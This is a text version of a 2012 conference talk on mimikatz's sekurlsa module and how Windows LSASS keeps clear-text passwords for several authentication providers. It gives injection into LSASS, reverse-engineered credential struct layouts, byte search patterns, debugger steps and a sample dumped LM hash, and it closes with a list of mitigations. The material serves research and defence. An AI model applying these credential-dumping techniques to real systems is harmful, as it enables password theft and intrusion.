Mimikatz Phdays

mimikatz

Benjamin DELPY `gentilkiwi`


focus on sekurlsa / pass-the-pass

Who ? Why ?
Benjamin DELPY `gentilkiwi`

French
26 years old
Kiwi addict
Lazy programmer

Started to code mimikatz to :
explain security concepts ;
improve my knowledge ;
prove to Microsoft that sometimes they must change old habits.

Why all in French ?
because I'm
It limits script kiddies' usage.
8/21/2014

Benjamin DELPY `gentilkiwi` @ PHDays 2012

benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz
working
On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
x86 & x64
partial support for 8 & Server 8 (few kernel driver bugs ;))
2000 support dropped with mimikatz 1.0

Everywhere ; it's statically compiled

Two modes
direct action (local commands)
process or driver communication

[diagram: mimikatz.exe and the Windows services it talks to]
KeyIso (CNG Key Isolation, in LSASS.EXE) - direct action : crypto::patchcng
EventLog (Windows Event Log, in SVCHOST.EXE) - direct action : divers::eventdrop
SamSS (Security Accounts Manager, in LSASS.EXE) - sekurlsa.dll injected with VirtualAllocEx, WriteProcessMemory, CreateRemoteThread... ; once inside, sekurlsa.dll opens a pipe, writes a welcome message, waits for commands and returns results

mimikatz
architecture
all in VC/C++ 2010 with some ASM

[diagram: module layout]

mimikatz.exe command modules :
mod_mimikatz_standard, mod_mimikatz_winmine, mod_mimikatz_divers, mod_mimikatz_nogpo, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump, mod_mimikatz_crypto, mod_mimikatz_handle, mod_mimikatz_privilege, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver

Library modules used by the command modules :
mod_parseur, mod_text, mod_memory, mod_secacl, mod_pipe, mod_inject, mod_hive, mod_crypto, mod_patch, mod_privilege, mod_system, mod_service, mod_process, mod_thread, mod_ts

sekurlsa.dll providers :
msv_1_0, tspkg, wdigest, livessp, kerberos, sam, secrets

Other binaries :
KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, kappfree.dll, kelloworld.dll, klock.dll, mimikatz.sys

mimikatz :: sekurlsa
what is it ?

My favorite library !
A thread that waits, in LSASS, for commands from mimikatz (or mubix' meterpreter)

What can sekurlsa do from the inside ?
Dump system secrets
Dump SAM / DC base
Dump clear text passwords/hashes from interactive sessions :
MSV1_0 (dump/inject/delete)
TsPkg
WDigest
LiveSSP
Kerberos

Let's start an injection & pass the hash !

mimikatz :: sekurlsa
history of pass-the-* 1/2

Pass-the-hash
1997 - Unix modified SAMBA client for hash usage ; Paul Ashton (EIGEN)
2000 - Private version of a Windows LSA Logon Session Editor ; Hernan Ochoa (CoreSecurity)
2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) presents msvctl and provides some downloads of it
2007 - Pass the hash toolkit published ; Hernan Ochoa (CoreSecurity)
2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French ; so not famous ;))

2007 was the year of pass the hash !

Pass-the-ticket
04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support ; Hernan Ochoa (Ampliasecurity)

mimikatz :: sekurlsa
history of pass-the-* 2/2

Pass-the-pass
05/2011 - mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
http://blog.gentilkiwi.com/securite/pass-the-pass

05/2011 - return of mimikatz ; it dumps clear text passwords from the WDigest provider (unlimited this time ;))
http://blog.gentilkiwi.com/securite/re-pass-the-pass

05/2011 - Some organizations opened cases with Microsoft about it

Lots of time
begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction
http://seclists.org/pen-test/2012/Mar/7

03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
http://blog.gentilkiwi.com/securite/rere-pass-the-pass

03/2012 - yeah, once again, more curious, but Kerberos keeps passwords in memory
http://blog.gentilkiwi.com/securite/rerere-pass-the-pass

mimikatz :: sekurlsa
let's take a moment

You noticed ?
It has been one year since Microsoft was notified about password extraction from LSASS
Without any reaction
But blacklisting mimikatz from MSE and FEP on 20120228 ;)

mimikatz :: sekurlsa :: tspkg

because sometimes hash is not enough



mimikatz :: sekurlsa :: tspkg
what is it ?

Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDesktop users' experience
http://technet.microsoft.com/library/cc772108.aspx

Relies on CredSSP with Credentials Delegation (!= Account delegation)
Specs : http://download.microsoft.com/download/9/5/e/95ef66af9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf

First impression : it seems cool
User does not have to type his password
Password is not in the RDP file
Password is not in user secrets

mimikatz :: sekurlsa :: tspkg


demo time !

Explanations follow

mimikatz :: sekurlsa :: tspkg
questions ?

KB says that for it to work, we must enable Default credentials delegation
Default credentials : The credentials obtained when the user first logs on to Windows - https://msdn.microsoft.com/library/bb204773.aspx

What ? Our User/Domain/{Password | Hash | Ticket} ? It seems
In all cases, the system seems to be vulnerable to pass-the-*

In what form ?
Our specs : [MS-CSSP]

2.2.1.2.1 TSPasswordCreds
The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN)
TSPasswordCreds ::= SEQUENCE {
    domainName [0] OCTET STRING,
    userName [1] OCTET STRING,
    password [2] OCTET STRING
}

Challenge / response for authentication ?
Server : YES (TLS / Kerberos)
Client : NO ; *password* is sent to the server

So the password resides somewhere in memory ?
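As an added example (not from the talk and not mimikatz code), a minimal DER encoder/decoder for the TSPasswordCreds structure above. It assumes explicit context tags, as in the rest of the CredSSP module, and UTF-16LE text inside the OCTET STRINGs; the sample values are constructed from the demo account shown later in the deck. Decoding the blob back shows that, once the TLS layer is removed, the delegated password is a plain field and not a challenge response.

```python
"""
DER encode/decode for [MS-CSSP] TSPasswordCreds (added example, not from the slides).

TSPasswordCreds ::= SEQUENCE {
    domainName [0] OCTET STRING,
    userName   [1] OCTET STRING,
    password   [2] OCTET STRING
}
Assumptions: EXPLICIT context tags (0xA0 | n wrapping a 0x04 OCTET STRING)
and UTF-16LE text in each OCTET STRING.
"""

FIELD_NAMES = {0: "domainName", 1: "userName", 2: "password"}


def _der_len(n: int) -> bytes:
    # Short form below 128, otherwise 0x80 | byte-count followed by big-endian length.
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(value)) + value


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the TLV starting at buf[pos]; strict about truncation."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        count = first & 0x7F
        if count == 0 or pos + count > len(buf):      # 0x80 alone is indefinite length: not DER
            raise ValueError("bad DER length")
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[pos:pos + length], pos + length


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """Build the DER SEQUENCE a CredSSP client delegates to the server (inside TLS)."""
    fields = []
    for idx, text in enumerate((domain, user, password)):
        octets = _tlv(0x04, text.encode("utf-16-le"))   # OCTET STRING
        fields.append(_tlv(0xA0 | idx, octets))          # [idx] EXPLICIT, constructed
    return _tlv(0x30, b"".join(fields))                  # SEQUENCE


def decode_ts_password_creds(der: bytes) -> dict:
    """Parse TSPasswordCreds back into its three text fields."""
    tag, body, end = _read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("expected exactly one DER SEQUENCE")
    fields = {}
    pos = 0
    while pos < len(body):
        ctx, inner, pos = _read_tlv(body, pos)
        if (ctx & 0xE0) != 0xA0 or (ctx & 0x1F) not in FIELD_NAMES:
            raise ValueError(f"unexpected tag 0x{ctx:02x}")
        inner_tag, octets, inner_end = _read_tlv(inner, 0)
        if inner_tag != 0x04 or inner_end != len(inner):
            raise ValueError("context tag must wrap exactly one OCTET STRING")
        fields[FIELD_NAMES[ctx & 0x1F]] = octets.decode("utf-16-le")
    if len(fields) != len(FIELD_NAMES):
        raise ValueError("missing field")
    return fields


if __name__ == "__main__":
    # Constructed sample values (the deck's demo account), not captured traffic.
    blob = encode_ts_password_creds("DEMO", "termuser", "waza1234/")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
```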



mimikatz :: sekurlsa :: tspkg
symbols & theory

Let's explore some symbols !

kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>

sounds cool (thanks Microsoft)

Let's imagine a scenario
Enumerate all sessions to obtain information : Username, Domain, LUID
Call tspkg!TSCredTableLocateDefaultCreds with the LUID to obtain : TS_CREDENTIAL
Call tspkg!TSObtainClearCreds with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for : TS_PRIMARY_CREDENTIAL with clear text credentials

mimikatz :: sekurlsa :: tspkg
test & data

[flow] LsaEnumerateLogonSessions -> for each LUID -> tspkg!TSCredTableLocateDefaultCreds -> tspkg!TSObtainClearCreds -> password in clear ?

mimikatz :: sekurlsa :: tspkg
test & structures (lazy way)

[flow] LsaEnumerateLogonSessions -> for each LUID -> tspkg!TSCredTableLocateDefaultCreds -> KIWI_TS_CREDENTIAL -> KIWI_TS_PRIMARY_CREDENTIAL -> tspkg!TSObtainClearCreds -> KIWI_TS_PRIMARY_CREDENTIAL -> password in clear ?

/* declared first so that PKIWI_TS_PRIMARY_CREDENTIAL is known when KIWI_TS_CREDENTIAL uses it */
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[0x88];
#elif defined _M_IX86
    BYTE unk0[0x50];
#endif
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

mimikatz :: sekurlsa :: tspkg
first result

It worked !
Since old Windows versions I hadn't seen my Windows password
I've been a little bit afraid
After many hesitations, I published a post and a stable tool update on my blog on 20110508
http://blog.gentilkiwi.com/securite/pass-the-pass

But some issues :
tspkg!TSCredTableLocateDefaultCreds & tspkg!TSObtainClearCreds are not exported
tspkg!TSObtainClearCreds is not always present
Calling conventions can be a problem
Only NT6 and few XP SP3 (manual provider activation)

mimikatz :: sekurlsa :: tspkg
final implementation

[flow] LsaEnumerateLogonSessions -> for each LUID -> KIWI_TS_CREDENTIAL_AVL_SEARCH -> RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable -> KIWI_TS_CREDENTIAL -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear !

/* search key passed to RtlLookupElementGenericTableAvl ; only the LUID matters */
typedef struct _KIWI_TS_CREDENTIAL_AVL_SEARCH {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk1[46];
#elif defined _M_IX86
    BYTE unk1[16];
#endif
} KIWI_TS_CREDENTIAL_AVL_SEARCH, *PKIWI_TS_CREDENTIAL_AVL_SEARCH;

/* declared first so that PKIWI_TS_PRIMARY_CREDENTIAL is known when KIWI_TS_CREDENTIAL uses it */
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[0x88];
#elif defined _M_IX86
    BYTE unk0[0x50];
#endif
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

mimikatz :: sekurlsa :: tspkg


demo time !


mimikatz :: sekurlsa :: tspkg
final result

It works better ;)
No orphan referenced credentials
More logical approach (we will see that later)

We just have to find :
tspkg!TSGlobalCredTable
SeckPkgFunctionTable->LsaUnprotectMemory
LSA_SECPKG_FUNCTION_TABLE : http://msdn.microsoft.com/library/windows/desktop/aa378510.aspx
LsaUnprotectMemory : http://msdn.microsoft.com/library/windows/desktop/ff714510.aspx

Find this
We all have personal convictions on how to search for unexported data :
Hardcoded addresses / offsets ;
Disassembly engine ;
Pattern matching ;

mimikatz :: sekurlsa :: wdigest

because clear text password over http/https is not cool



mimikatz :: sekurlsa :: wdigest
what is it ?

Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network [...]
Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication

Common Digest Authentication Scenarios :
Authenticated client access to a Web site
Authenticated client access using SASL
Authenticated client access with integrity protection to a directory service using LDAP
Microsoft : http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool
No password over the network, just hashes
No reversible password in Active Directory ; hashes for each realm (only with Advanced Digest authentication)

mimikatz :: sekurlsa :: wdigest
what is it ?

We speak about hashes, but what hashes ?
H = MD5(HA1:nonce:[...]:HA2)
HA1 = MD5(username:realm:password)
HA2 = MD5(method:digestURI:[...])

Even after login, HA1 may change : the realm comes from the server side and cannot be determined before Windows logon
So the WDigest provider must have the elements to compute responses for different servers :
Username
Realm (from server)
Password
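Added example (not from the talk): the three digest formulas above carried out with Python's hashlib for qop=auth, using the RFC 2617 section 3.5 sample challenge as constructed input. It shows that HA1 changes with the realm, so a client that stored only one HA1 could not answer a second server, while a server can verify with a per-realm HA1 store and never needs the password; `client_response`, `server_verify`, `demo` and the RFC_* constants are names chosen for this example.

```python
"""RFC 2617 Digest computation as used by WDigest (added example, not from the slides)."""
import hashlib
import hmac


def _md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm is chosen by the server in its challenge."""
    return _md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth (the entity-body hash only exists for auth-int)."""
    return _md5_hex(f"{method}:{digest_uri}")


def response_from_ha1(h1: str, nonce: str, nc: str, cnonce: str, qop: str, h2: str) -> str:
    """H = MD5(HA1:nonce:nc:cnonce:qop:HA2), the slide's '[...]' spelled out for qop=auth."""
    return _md5_hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")


def client_response(username, password, realm, method, uri, nonce, nc, cnonce, qop="auth"):
    """Client side: the realm only arrives with the 401 challenge, so HA1 cannot be
    precomputed for a server not seen before; the password itself has to be at hand."""
    return response_from_ha1(ha1(username, realm, password), nonce, nc, cnonce, qop, ha2(method, uri))


def server_verify(ha1_store, username, realm, method, uri, nonce, nc, cnonce, response, qop="auth"):
    """Server side: a table of per-realm HA1 values (the 'hashes for each realm' of the slide)
    is enough to check a response; the server never holds the clear password."""
    h1 = ha1_store.get((username, realm))
    if h1 is None:
        return False
    expected = response_from_ha1(h1, nonce, nc, cnonce, qop, ha2(method, uri))
    return hmac.compare_digest(expected, response)   # constant-time comparison


# Constructed parameters: the RFC 2617 section 3.5 example challenge and credentials.
RFC_USER, RFC_REALM, RFC_PASSWORD = "Mufasa", "testrealm@host.com", "Circle Of Life"
RFC_NONCE, RFC_NC, RFC_CNONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093", "00000001", "0a4f113b"
RFC_METHOD, RFC_URI = "GET", "/dir/index.html"


def demo():
    """Returns (HA1 differs between realms, server accepted the response, the response)."""
    # Two servers presenting different realms need two different HA1 values,
    # which is exactly why WDigest keeps the password and not a single hash.
    first = ha1(RFC_USER, RFC_REALM, RFC_PASSWORD)
    second = ha1(RFC_USER, "other-realm@example.net", RFC_PASSWORD)
    store = {(RFC_USER, RFC_REALM): first}   # server-side store keyed by (user, realm)
    resp = client_response(RFC_USER, RFC_PASSWORD, RFC_REALM, RFC_METHOD, RFC_URI,
                           RFC_NONCE, RFC_NC, RFC_CNONCE)
    ok = server_verify(store, RFC_USER, RFC_REALM, RFC_METHOD, RFC_URI,
                       RFC_NONCE, RFC_NC, RFC_CNONCE, resp)
    return first != second, ok, resp


if __name__ == "__main__":
    print(demo())
```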

mimikatz :: sekurlsa :: wdigest
theory

This time, we know :
that WDigest keeps the password in memory, by protocol, for the HA1 digest
that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)

LsaUnprotectMemory
At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
Let's perform a search in WDigest :
.text:7409D151 _DigestCalcHA1@8 call dword ptr [eax+0B4h]
Hypothesis seems verified

LsaProtectMemory
At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
Let's perform a search in WDigest :
.text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]

SpAcceptCredentials takes the clear password in its arguments
Protects it with LsaProtectMemory
Updates or inserts data in a doubly linked list : wdigest!l_LogSessList

mimikatz :: sekurlsa :: wdigest
test & data

[flow] LsaEnumerateLogonSessions -> for each LUID -> wdigest!l_LogSessList -> search linked list for LUID -> LsaUnprotectMemory -> password in clear ?

mimikatz :: sekurlsa :: wdigest
final implementation

[flow] LsaEnumerateLogonSessions -> for each LUID -> wdigest!l_LogSessList -> search linked list for LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear !

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    /* [...] fields elided on the slide */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    /* [...] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

mimikatz :: sekurlsa :: wdigest


demo time !


mimikatz :: sekurlsa :: wdigest
result

It works again !
This time we just have to find :
wdigest!l_LogSessList
SeckPkgFunctionTable->LsaUnprotectMemory
LSA_SECPKG_FUNCTION_TABLE : http://msdn.microsoft.com/library/windows/desktop/aa378510.aspx
LsaUnprotectMemory : http://msdn.microsoft.com/library/windows/desktop/ff714510.aspx

Seems generalizable ?

mimikatz :: sekurlsa
and now what ?

In fact, with TsPkg and WDigest, passwords can be retrieved from any version of Windows ...
WDigest : XP, 2003 ; Vista / Seven / 2008 / 2008r2 ; 8 (but not with a Live account)
TsPkg : XP SP3 (manual install) ; Vista / Seven / 2008 / 2008r2 ; 8 (even with a Live account)

mimikatz :: sekurlsa
and now what ?

wce had not copied my TsPkg functionalities
Only WDigest, so they missed Windows 8 Live accounts

Kiwi WDigest patterns (last public release)
#ifdef _M_X64
BYTE ptrInsertInLogSess[] = {0x4C, 0x89, 0x1B, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5B, 0x08, 0x48, 0x8D};
#elif defined _M_IX86
BYTE ptrInsertInLogSess[] = {0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04};
#endif

wce patterns
Between ~17 occurrences of wdigest!l_LogSessList, maybe a coincidence

For lack of TsPkg, can they be inspired by the next releases ?

mimikatz :: sekurlsa :: livessp

because Microsoft was too good in closed networks



mimikatz :: sekurlsa :: livessp
how ?

Actually I've only used a logical (empirical) approach to search for passwords :
Protocol reading
Symbols searching

~ Boring ~ let's be more brutal this time : make a WinDBG trap !

0: kd> !process 0 0 lsass.exe
PROCESS 83569040 SessionId: 0 Cid: 0224 Peb: 7f43f000 ParentCid: 01b4
DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible>
Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
............................................................
0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"
0: kd> g

mimikatz :: sekurlsa :: livessp
how ?

Let's log in with a Live account on Windows 8 !

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
-> Our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
-> Yeah, Pass the Hash capability with a Live account too

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
-> Live user can log on through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
livessp!LsaApLogonUserEx2+0x560 (74781a96):
call to livessp!LiveCreateLogonSession (74784867)

After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

mimikatz :: sekurlsa :: livessp
final implementation

[flow] LsaEnumerateLogonSessions -> for each LUID -> livessp!LiveGlobalLogonSessionList -> search linked list for LUID -> KIWI_LIVESSP_LIST_ENTRY -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear !

/* declared first so that PKIWI_LIVESSP_PRIMARY_CREDENTIAL is known when the list entry uses it */
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

mimikatz :: sekurlsa :: livessp


demo time !


mimikatz :: sekurlsa
it was a cool trap, no ?

Even if we already have tools for normal accounts, are you not curious to test one with this trap ?*

* Me, yes

mimikatz :: sekurlsa :: kerberos

Let's log in with a normal account

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
-> Kerberos, ticket part ? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
-> Kerberos part for password ??????

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

After credentials protection, KerbCreateLogonSession calls :
NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList

mimikatz :: sekurlsa :: kerberos (nt 6)
final implementation

[flow] LsaEnumerateLogonSessions -> for each LUID -> KIWI_KERBEROS_LOGON_AVL_SEARCH -> RtlLookupElementGenericTableAvl on Kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear !

/* search key passed to RtlLookupElementGenericTableAvl ; only the LUID matters */
typedef struct _KIWI_KERBEROS_LOGON_AVL_SEARCH {
#ifdef _M_X64
    BYTE unk0[64];
#elif defined _M_IX86
    BYTE unk0[36];
#endif
    LUID LocallyUniqueIdentifier;
} KIWI_KERBEROS_LOGON_AVL_SEARCH, *PKIWI_KERBEROS_LOGON_AVL_SEARCH;

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
#ifdef _M_X64
    BYTE unk3[96];
#elif defined _M_IX86
    BYTE unk3[68];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;

mimikatz :: sekurlsa :: kerberos (nt 5)
final implementation

[flow] LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbLogonSessionList -> search linked list for LUID -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear !

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* [...] fields elided on the slide */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

mimikatz :: sekurlsa :: kerberos


demo time !


mimikatz :: sekurlsa :: kerberos
hu ?

Ok, it works*
But why ?
* Not at all logons on NT5
* Can need an unlock

From my understanding of Microsoft's explanations, there is no need of passwords for the Kerberos protocol, all is based on the hash (not very sexy either)

mimikatz :: sekurlsa :: kerberos
BONUS hu ?

Microsoft's implementation of Kerberos is full of logical

For password auth :
password hash for the shared secret, but keeping the password in memory

For full smartcard auth :
No password on the client
No hash on the client ?
NTLM hash on the client
KDC sent it back as a gift

mimikatz :: sekurlsa
why is this dangerous ?

Not a bug
Not a weakness
Not a vulnerability
Not a 0-day
(for now, there may be some too)

It's normal that LSASS keeps passwords in memory for password-based providers when protocols need them
And hashes for msv1_0
All of these rely on shared secrets

So you can't prevent Windows internal behaviors (in a supported way)
One change from Microsoft on protocols can impact all versions
I don't count on a fix or other things in the next [5;10] years

mimikatz :: sekurlsa
what can we do ?

Basics
No physical access to the computer (first step to pass the hash)
No admin rights / system rights / debug privileges
Disable local admin accounts
Strong passwords (haha, it was a joke)
Network logon instead of interactive (when possible)
Audit ; pass the hash keeps traces and can lock accounts
No admin rights / system rights / debug privileges, even for VIPs

More in depth
Force strong authentication (SmartCard & Token) : $ /
Short validity for Kerberos tickets
No delegation
Disable NTLM (available with NT6)
Nothing exotic :
biometrics (it keeps the password somewhere and pushes it to Windows)
single sign on
Stop shared secrets for authentication : push Public / Private stuff (like keys ;))
Leave opportunities to stop retrocompatibility
Disable faulty providers ? Is it supported by Microsoft ? Even if it is, will you disable Kerberos and msv1_0 ?

mimikatz :: sekurlsa
Code it ! Implement it in Meta ! Discover !

Pass the hash :
Package | Symbols | Description
msv1_0 | SeckPkgFunctionTable->GetCredentials, SeckPkgFunctionTable->LsaUnprotectMemory | Get clear LM & NTLM hashes from LUID
msv1_0 | SeckPkgFunctionTable->LsaProtectMemory, SeckPkgFunctionTable->AddCredential | Push clear LM & NTLM hashes to LUID
msv1_0 | SeckPkgFunctionTable->DeleteCredential | Delete hashes from LUID

Get passwords :
Package | Symbols | Type
tspkg | tspkg!TSGlobalCredTable, SeckPkgFunctionTable->LsaUnprotectMemory | RTL_AVL_TABLE
wdigest | wdigest!l_LogSessList, SeckPkgFunctionTable->LsaUnprotectMemory | LIST_ENTRY
livessp | livessp!LiveGlobalLogonSessionList, SeckPkgFunctionTable->LsaUnprotectMemory | LIST_ENTRY
kerberos (nt5) | kerberos!KerbLogonSessionList, SeckPkgFunctionTable->LsaUnprotectMemory | LIST_ENTRY
kerberos (nt6) | Kerberos!KerbGlobalLogonSessionTable, SeckPkgFunctionTable->LsaUnprotectMemory | RTL_AVL_TABLE

mimikatz :: sekurlsa
little help to start !

Package | Data | Little help
(all) | @getLogonPasswords | Use full keyword in argument of functions
msv1_0 | @getMSV | @getMSVFunctions
tspkg | @getTsPkg | @getTsPkgFunctions
wdigest | @getWDigest | @getWDigestFunctions
livessp | @getLiveSSP | @getLiveSSPFunctions
kerberos | @getKerberos | @getKerberosFunctions

Sample output of the data commands (output is in French) :

msv1_0 :
 * Utilisateur : termuser
 * Domaine : DEMO
 * Hash LM : d0e9aee149655a6075e4540af1f22d3b
